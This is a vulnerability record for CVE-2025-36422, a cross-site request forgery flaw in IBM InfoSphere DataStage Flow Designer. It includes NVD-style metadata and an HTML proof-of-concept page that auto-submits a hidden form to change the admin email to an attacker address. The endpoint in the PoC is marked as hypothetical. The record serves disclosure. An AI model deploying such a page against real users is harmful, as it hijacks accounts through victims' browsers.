CVE-2025-36422

<!-- PoC for CVE-2025-36422 (CSRF) Description: This HTML snippet demonstrates how an attacker could craft a malicious page to perform an unauthorized action on behalf of an authenticated user. Note: The target endpoint and parameters are hypothetical examples based on the vulnerability type. --> <!DOCTYPE html> <html> <body> <h2>You are being redirected...</h2> <!-- The form auto-submits to the vulnerable endpoint --> <form id="csrf-form" action="http://target-server:port/ibm/iis/flow-designer/api/updateConfig" method="POST"> <!-- Hidden inputs representing malicious parameters --> <input type="hidden" name="setting_id" value="admin_email" /> <input type="hidden" name="setting_value" value="[email protected]" /> <input type="hidden" name="confirm" value="true" /> </form> <script> // Automatically submit the form when the page loads document.getElementById("csrf-form").submit(); </script> </body> </html>

{"cve": {"id": "CVE-2025-36422", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:25.093", "lastModified": "2026-03-26T18:17:08.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 IBM InfoSphere DataStage Flow Designer is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts."}, {"lang": "es", "value": "IBM InfoSphere Information Server 11.7.0.0 hasta 11.7.1.6 IBM InfoSphere DataStage Flow Designer es vulnerable a falsificación de petición en sitios cruzados lo que podría permitir a un atacante ejecutar acciones maliciosas y no autorizadas transmitidas desde un usuario en quien el sitio web confía."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.7.0.0", "versionEndIncluding": "11.7.1.6", "matchCriteriaId": "65FBF88B-61F0-4D42-A290-453FDC874D7F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:*", "matchCriteriaId": "E492C463-D76E-49B7-A4D4-3B499E422D89"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7266685", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}